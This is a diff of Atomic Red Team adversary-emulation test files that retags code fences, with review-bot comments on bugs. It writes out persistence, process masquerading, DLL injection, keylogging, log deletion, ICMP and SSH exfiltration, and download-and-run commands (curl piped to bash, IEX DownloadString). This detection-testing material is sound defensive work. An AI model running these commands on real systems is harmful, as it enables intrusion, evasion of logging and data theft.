@@ -61,7 +63,9 @@ Identify System owner or users on an endpoint
#### Attack Commands: Run with `sh`!
```
```sh
users
w
who
+9 -4
@@ -25,7 +25,9 @@ Creates a service specifying an aribrary command and executes it. When executing
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
sc.exe create #{service_name} binPath= #{executable_command}
sc.exe start #{service_name}
sc.exe delete #{service_name}
@@ -54,20 +56,23 @@ Will run a command on a remote host
#### Attack Commands: Run with `powershell`!
```
```powershell
#{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe"
```
#### Dependencies: Run with `powershell`!
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null
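Review bot: the Check Prereq line `if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1}` carries a stray second double quote after the path, which is a PowerShell parse error, so the check errors out instead of returning 0 or 1. In the Get Prereq block, `New-Item -ItemType Directory ("#{psexec_exe}")` creates a directory at the executable's own path rather than its parent; the other atomics use `(Split-Path "#{psexec_exe}")`, and the later copy into that path will fail if a directory already occupies it. Both are pre-existing, but this commit is already rewriting these blocks' fences.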
+34 -17
@@ -47,13 +47,15 @@ Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsas
#### Attack Commands: Run with `command_prompt`!
```
```cmd
cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
cmd.exe /c %SystemRoot%\Temp\lsass.exe
```
#### Cleanup Commands:
```
```cmd
del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
```
@@ -72,7 +74,9 @@ Copies sh process, renames it as crond, and executes it to masquerade as the cro
#### Attack Commands: Run with `sh`!
```
```sh
cp /bin/sh /tmp/crond
/tmp/crond
```
@@ -93,13 +97,15 @@ Copies cscript.exe, renames it, and launches it to masquerade as an instance of
#### Attack Commands: Run with `command_prompt`!
```
```cmd
copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y
cmd.exe /c %APPDATA%\notepad.exe /B
```
#### Cleanup Commands:
```
```cmd
del /Q /F %APPDATA%\notepad.exe >nul 2>&1
```
@@ -118,13 +124,15 @@ Copies wscript.exe, renames it, and launches it to masquerade as an instance of
#### Attack Commands: Run with `command_prompt`!
```
```cmd
copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
cmd.exe /c %APPDATA%\svchost.exe /B
```
#### Cleanup Commands:
```
```cmd
del /Q /F %APPDATA%\svchost.exe >nul 2>&1
```
@@ -143,13 +151,15 @@ Copies powershell.exe, renames it, and launches it to masquerade as an instance
#### Attack Commands: Run with `command_prompt`!
```
```cmd
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y
cmd.exe /K %APPDATA%\taskhostw.exe
```
#### Cleanup Commands:
```
```cmd
del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
```
@@ -174,26 +184,29 @@ Copies an exe, renames it as a windows exe, and launches it to masquerade as a r
#### Attack Commands: Run with `powershell`!
```
```powershell
copy #{inputfile} #{outputfile}
$myT1036 = (Start-Process -PassThru -FilePath #{outputfile}).Id
Stop-Process -ID $myT1036
```
#### Cleanup Commands:
```
```powershell
Remove-Item #{outputfile} -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Exe file to copy must exist on disk at specified location (#{inputfile})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{inputfile}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/t1036.exe" -OutFile "#{inputfile}"
```
@@ -218,14 +231,16 @@ Copies a windows exe, renames it as another windows exe, and launches it to masq
#### Attack Commands: Run with `powershell`!
```
```powershell
copy #{inputfile} #{outputfile}
$myT1036 = (Start-Process -PassThru -FilePath #{outputfile}).Id
Stop-Process -ID $myT1036
```
#### Cleanup Commands:
```
```powershell
Remove-Item #{outputfile} -Force -ErrorAction Ignore
```
@@ -245,13 +260,15 @@ This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
copy C:\Windows\System32\cmd.exe C:\lsm.exe
C:\lsm.exe /c echo T1036 > C:\T1036.txt
```
#### Cleanup Commands:
```
```cmd
del C:\T1036.txt >nul 2>&1
del C:\lsm.exe >nul 2>&1
```
+20 -10
@@ -41,13 +41,15 @@ Adds a registry value to run batch script created in the C:\Windows\Temp directo
#### Attack Commands: Run with `command_prompt`!
```
```cmd
echo cmd /c "#{script_command}" > #{script_path}
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}"
```
#### Cleanup Commands:
```
```cmd
REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f
del #{script_path} >nul 2>nul
del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>nul
@@ -68,13 +70,15 @@ Run an exe on user logon or system startup
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
schtasks /create /tn "T1037_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1037_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
```
#### Cleanup Commands:
```
```cmd
schtasks /delete /tn "T1037_OnLogon" /f
schtasks /delete /tn "T1037_OnStartup" /f
```
@@ -126,7 +130,9 @@ vbs files can be placed in and ran from the startup folder to maintain persistan
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Copy-Item $PathToAtomicsFolder\T1037\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
Copy-Item $PathToAtomicsFolder\T1037\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
@@ -134,7 +140,7 @@ cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbssta
```
#### Cleanup Commands:
```
```powershell
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore
```
@@ -154,7 +160,9 @@ jse files can be placed in and ran from the startup folder to maintain persistan
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Copy-Item $PathToAtomicsFolder\T1037\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
Copy-Item $PathToAtomicsFolder\T1037\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
@@ -162,7 +170,7 @@ cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sta
```
#### Cleanup Commands:
```
```powershell
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore
```
@@ -182,7 +190,9 @@ bat files can be placed in and ran from the startup folder to maintain persistan
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Copy-Item $PathToAtomicsFolder\T1037\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Copy-Item $PathToAtomicsFolder\T1037\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
@@ -190,7 +200,7 @@ Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\bats
```
#### Cleanup Commands:
```
```powershell
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore
```
+4 -2
@@ -27,14 +27,16 @@ https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
%APPDATA%\updater.exe -Command exit
```
#### Cleanup Commands:
```
```cmd
del %APPDATA%\updater.exe >nul 2>&1
del %APPDATA%\amsi.dll >nul 2>&1
```
+12 -4
@@ -32,7 +32,9 @@ Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be in
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
```bash
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
```
@@ -58,7 +60,9 @@ Perform a PCAP on MacOS. This will require Wireshark/tshark to be installed. TCP
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
```bash
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
```
@@ -85,7 +89,9 @@ installed, along with WinPCAP. Windump will require the windump executable.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
c:\windump.exe
```
@@ -112,7 +118,9 @@ installed, along with WinPCAP. Windump will require the windump executable.
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
& "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
& c:\windump.exe
```
+3 -1
@@ -30,7 +30,9 @@ Change Default File Association From cmd.exe
#### Attack Commands: Run with `command_prompt`!
```
```cmd
cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}"
```
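Review bot: the input argument `#{target_exenstion_handler}` is misspelled (`exenstion`). This markdown is generated from the YAML, so rename the argument to `target_extension_handler` there and regenerate; otherwise every consumer of the atomic has to carry the typo.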
+3 -1
@@ -34,7 +34,9 @@ copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe
#### Attack Commands: Run with `powershell`!
```
```powershell
Get-WmiObject win32_service | select PathName
get-acl "C:\Program Files (x86)\Google\Update\#{weak_permission_file}" | FL | findstr "FullControl"
```
+6 -2
@@ -21,7 +21,9 @@ Scan ports to check for listening ports
#### Attack Commands: Run with `sh`!
```
```sh
for port in {1..65535};
do
echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
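Review bot: the fence is now tagged `sh` to match the `sh` executor, but `for port in {1..65535};` relies on bash brace expansion and `/dev/tcp/...` is a bash-only pseudo-device; under a POSIX sh such as dash the loop body runs once with the literal string `{1..65535}` and the redirection simply fails. Either change the executor to `bash` in the YAML so the generated tag is right, or rewrite the loop with `seq`. The trailing `: ;` after the `||` branch also looks like a leftover, since `:` is just passed as an extra argument to echo.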
@@ -51,7 +53,9 @@ Scan ports to check for listening ports with Nmap.
#### Attack Commands: Run with `sh`!
```
```sh
nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
+18 -6
@@ -29,7 +29,9 @@ WMI List User Accounts
#### Attack Commands: Run with `command_prompt`!
```
```cmd
wmic useraccount get /ALL
```
@@ -49,7 +51,9 @@ WMI List Processes
#### Attack Commands: Run with `command_prompt`!
```
```cmd
wmic process get caption,executablepath,commandline
```
@@ -69,7 +73,9 @@ WMI List Software
#### Attack Commands: Run with `command_prompt`!
```
```cmd
wmic qfe get description,installedOn /format:csv
```
@@ -95,7 +101,9 @@ WMI List Remote Services
#### Attack Commands: Run with `command_prompt`!
```
```cmd
wmic /node:"#{node}" service where (caption like "%#{service_search_string} (%")
```
@@ -120,7 +128,9 @@ This test uses wmic.exe to execute a process on the local host.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
wmic process call create #{process_to_execute}
```
@@ -146,7 +156,9 @@ This test uses wmic.exe to execute a process on a remote host.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
wmic /node:"#{node}" process call create #{process_to_execute}
```
+9 -3
@@ -45,7 +45,9 @@ Remote to Local
#### Attack Commands: Run with `sh`!
```
```sh
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
```
@@ -74,7 +76,9 @@ Local to Remote
#### Attack Commands: Run with `sh`!
```
```sh
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
```
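Review bot: `openssl des3 -salt -pass #{password}` will be rejected unless the input argument already carries a source prefix; `-pass` expects `pass:<value>`, `env:<var>` or `file:<path>`, not a bare password. Either document that in the input's default or write `-pass "pass:#{password}"`. Consider `-aes-256-cbc` in place of `des3` as well so the test doesn't depend on a legacy cipher.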
@@ -130,7 +134,9 @@ Exfiltration of specified file over ICMP protocol.
#### Attack Commands: Run with `powershell`!
```
```powershell
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
```
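Review bot: `Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024` only works in Windows PowerShell 5.1; PowerShell 6 and later removed `-Encoding Byte` in favour of `-AsByteStream`, so under the newer engine the command errors out before any ICMP traffic is generated. State that constraint in the test description or branch on `$PSVersionTable.PSVersion.Major`.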
+9 -3
@@ -31,7 +31,9 @@ Get a listing of network connections.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
netstat
net use
net sessions
@@ -53,7 +55,9 @@ Get a listing of network connections.
#### Attack Commands: Run with `powershell`!
```
```powershell
Get-NetTCPConnection
```
@@ -73,7 +77,9 @@ Get a listing of network connections.
#### Attack Commands: Run with `sh`!
```
```sh
netstat
who -a
```
+14 -8
@@ -27,26 +27,29 @@ Installs A Local Service
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
sc.exe create #{service_name} binPath= #{binary_path}
sc.exe start #{service_name}
```
#### Cleanup Commands:
```
```cmd
sc.exe stop #{service_name}
sc.exe delete #{service_name}
```
#### Dependencies: Run with `powershell`!
##### Description: Service binary must exist on disk at specified location (#{binary_path})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{binary_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}"
```
@@ -71,27 +74,30 @@ Installs A Local Service via PowerShell
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" 2>&1 | Out-Null
Start-Service -Name "#{service_name}"
```
#### Cleanup Commands:
```
```powershell
Stop-Service -Name "#{service_name}" 2>&1 | Out-Null
try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()}
catch {}
```
#### Dependencies: Run with `powershell`!
##### Description: Service binary must exist on disk at specified location (#{binary_path})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{binary_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}"
```
+15 -7
@@ -26,7 +26,9 @@ Note: deprecated in Windows 8+
#### Attack Commands: Run with `command_prompt`!
```
```cmd
at 13:20 /interactive cmd
```
@@ -51,12 +53,14 @@ at 13:20 /interactive cmd
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
```
#### Cleanup Commands:
```
```cmd
SCHTASKS /Delete /TN spawn /F
```
@@ -84,12 +88,14 @@ Create a task on a remote system
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
```
#### Cleanup Commands:
```
```cmd
SCHTASKS /Delete /TN "Atomic task" /F
```
@@ -109,7 +115,9 @@ These could be considered "fileless" scheduled task creation.
#### Attack Commands: Run with `powershell`!
```
```powershell
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
@@ -119,7 +127,7 @@ Register-ScheduledTask AtomicTask -InputObject $object
```
#### Cleanup Commands:
```
```powershell
Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
```
+22 -9
@@ -54,21 +54,24 @@ Windows 10 Utility To Inject DLLS
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$mypid = #{process_id}
mavinject $mypid /INJECTRUNNING #{dll_payload}
```
#### Dependencies: Run with `powershell`!
##### Description: Utility to inject must exist on disk at specified location (#{dll_payload})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}"
```
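Review bot: the dependency description reads "Utility to inject must exist on disk at specified location (#{dll_payload})", but the path and both prereq blocks refer to the DLL being injected, not to the mavinject utility. Reword it to "DLL to inject must exist on disk ..." so the generated docs don't send someone checking prerequisites after the wrong file.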
@@ -93,7 +96,9 @@ PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$mypid = #{process_id}
Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
```
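Review bot: `Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}` invokes the script file as though it were the function. PowerSploit's Invoke-DllInjection.ps1 only defines the `Invoke-DllInjection` function, so the script has to be dot-sourced first (`. .\Invoke-DllInjection.ps1`) and the function called afterwards; as written the command will not run. Nothing in this hunk shows a dependency check that the PowerSploit script exists on disk either, unlike the mavinject test above, which checks for its DLL.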
@@ -119,7 +124,9 @@ This test adds a shared library to the `ld.so.preload` list to execute and inter
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
```bash
echo #{path_to_shared_library} > /etc/ld.so.preload
```
@@ -144,7 +151,9 @@ This test injects a shared object library via the LD_PRELOAD environment variabl
#### Attack Commands: Run with `bash`!
```
```bash
LD_PRELOAD=#{path_to_shared_library} ls
```
@@ -176,7 +185,9 @@ Excercises Five Techniques
#### Attack Commands: Run with `command_prompt`!
```
```cmd
.\bin\#{exe_binary}
```
@@ -197,13 +208,15 @@ This works by copying cmd.exe to a file, naming it svchost.exe, then copying a f
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt
```
#### Cleanup Commands:
```
```cmd
del C:\T1055.txt >nul 2>&1
del C:\svchost.exe >nul 2>&1
```
+4 -2
@@ -30,13 +30,15 @@ Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/ma
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Set-Location $PathToAtomicsFolder
.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
```
#### Cleanup Commands:
```
```powershell
Remove-Item $env:TEMP\key.log -ErrorAction Ignore
```
+6 -2
@@ -32,7 +32,9 @@ Utilize ps to identify processes
#### Attack Commands: Run with `sh`!
```
```sh
ps >> #{output_file}
ps aux >> #{output_file}
```
@@ -53,7 +55,9 @@ Utilize tasklist to identify processes
#### Attack Commands: Run with `command_prompt`!
```
```cmd
tasklist
```
+3 -1
@@ -27,7 +27,9 @@ reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePa
#### Attack Commands: Run with `powershell`!
```
```powershell
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
```
+3 -1
@@ -21,7 +21,9 @@ This will download the specified payload and set a marker file in `/tmp/art-fish
#### Attack Commands: Run with `sh`!
```
```sh
bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash"
bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash"
```
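Review bot: the two download URLs disagree on case: the curl line uses `atomics/T1059/echo-art-fish.sh` while the wget line uses `Atomics/T1059/echo-art-fish.sh`. Paths on raw.githubusercontent.com are case-sensitive, so the second command fetches a 404 body and pipes nothing useful to bash; align it to `atomics`.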
+12 -6
@@ -59,12 +59,14 @@ Run Key Persistence
#### Attack Commands: Run with `command_prompt`!
```
```cmd
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
```
#### Cleanup Commands:
```
```cmd
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
```
@@ -88,12 +90,14 @@ RunOnce Key Persistence
#### Attack Commands: Run with `command_prompt`!
```
```cmd
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
```
#### Cleanup Commands:
```
```cmd
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
```
@@ -118,13 +122,15 @@ RunOnce Key Persistence via PowerShell
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$RunOnceKey = "#{reg_key_path}"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
```
#### Cleanup Commands:
```
```powershell
Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
```
+3 -1
@@ -26,7 +26,9 @@ Create a New-VM
#### Attack Commands: Run with `powershell`!
```
```powershell
Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname}
Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagementTools
New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -NewVHDSizeBytes 21474836480
+15 -5
@@ -34,7 +34,9 @@ Methods to identify Security Software on an endpoint
#### Attack Commands: Run with `command_prompt`!
```
```cmd
netsh.exe advfirewall firewall show all profiles
tasklist.exe
tasklist.exe | findstr /i virus
@@ -59,7 +61,9 @@ Methods to identify Security Software on an endpoint
#### Attack Commands: Run with `powershell`!
```
```powershell
get-process | ?{$_.Description -like "*virus*"}
get-process | ?{$_.Description -like "*carbonblack*"}
get-process | ?{$_.Description -like "*defender*"}
@@ -82,7 +86,9 @@ Methods to identify Security Software on an endpoint
#### Attack Commands: Run with `sh`!
```
```sh
ps -ef | grep Little\ Snitch | grep -v grep
ps aux | grep CbOsxSensorService
```
@@ -103,7 +109,9 @@ Discovery of an installed Sysinternals Sysmon service using driver altitude (eve
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
fltmc.exe | findstr.exe 385201
```
@@ -123,7 +131,9 @@ Discovery of installed antivirus products via a WMI query.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
wmic.exe /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
```
+7 -3
@@ -23,7 +23,9 @@ Creates and executes a simple bash script.
#### Attack Commands: Run with `sh`!
```
```sh
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
chmod +x /tmp/art.sh
@@ -52,13 +54,15 @@ Creates and executes a simple batch script.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
C:\Windows\system32\cmd.exe /Q /c echo #{command_to_execute} > #{script_to_create}
C:\Windows\system32\cmd.exe /Q /c #{script_to_create}
```
#### Cleanup Commands:
```
```cmd
del #{script_to_create} >nul 2>&1
```
+6 -2
@@ -25,7 +25,9 @@ Testing uncommonly used port utilizing PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
test-netconnection -ComputerName #{domain} -port #{port}
```
@@ -51,7 +53,9 @@ Testing uncommonly used port utilizing telnet.
#### Attack Commands: Run with `sh`!
```
```sh
telnet #{domain} #{port}
```
+12 -4
@@ -41,7 +41,9 @@ Permission Groups Discovery
#### Attack Commands: Run with `sh`!
```
```sh
dscacheutil -q group
dscl . -list /Groups
groups
@@ -63,7 +65,9 @@ Basic Permission Groups Discovery for Windows
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net localgroup
net group /domain
net group "domain admins" /domain
@@ -90,7 +94,9 @@ Permission Groups Discovery utilizing PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
get-localgroup
get-ADPrincipalGroupMembership #{user} | select name
```
@@ -111,7 +117,9 @@ Runs "net group" command including command aliases and loose typing to simulate
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net group /domai "Domain Admins"
net groups "Account Operators" /doma
net groups "Exchange Organization Management" /doma
+22 -8
@@ -50,7 +50,9 @@ Clear Windows Event Logs
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
wevtutil cl #{log_name}
```
@@ -70,7 +72,9 @@ Manages the update sequence number (USN) change journal, which provides a persis
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
fsutil usn deletejournal /D C:
```
@@ -90,7 +94,9 @@ Delete system and audit logs
#### Attack Commands: Run with `sh`!
```
```sh
rm -rf /private/var/log/system.log*
rm -rf /private/var/audit/*
```
@@ -116,7 +122,9 @@ This test overwrites the Linux mail spool of a specified user. This technique wa
#### Attack Commands: Run with `bash`!
```
```bash
echo 0> /var/spool/mail/#{username}
```
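Review bot: `echo 0> /var/spool/mail/#{username}` doesn't write the character `0`; the shell parses `0>` as a redirection of file descriptor 0, so echo prints an empty line to the terminal and the spool file is truncated only as a side effect. The net result matches the description ("overwrites"), but it reads as a typo; `: > /var/spool/mail/#{username}` or `echo 0 > ...` states the intent. The same applies to `echo 0> #{log_path}` in the next hunk.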
@@ -141,7 +149,9 @@ This test overwrites the specified log. This technique was used by threat actor
#### Attack Commands: Run with `bash`!
```
```bash
echo 0> #{log_path}
```
@@ -161,14 +171,16 @@ Recommended Detection: Monitor for use of the windows event log filepath in Powe
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$eventLogId = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'EventLog'" | Select-Object -ExpandProperty ProcessId
Stop-Process -Id $eventLogId -Force
Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx
```
#### Cleanup Commands:
```
```powershell
Start-Service -Name EventLog
```
@@ -187,7 +199,9 @@ Clear event logs using built-in PowerShell commands
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Clear-EventLog -logname Application
```
+25 -9
@@ -39,7 +39,9 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
#### Attack Commands: Run with `powershell`!
```
```powershell
Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
@@ -68,7 +70,9 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
#### Attack Commands: Run with `command_prompt`!
```
```cmd
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
@@ -97,7 +101,9 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
#### Attack Commands: Run with `sh`!
```
```sh
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
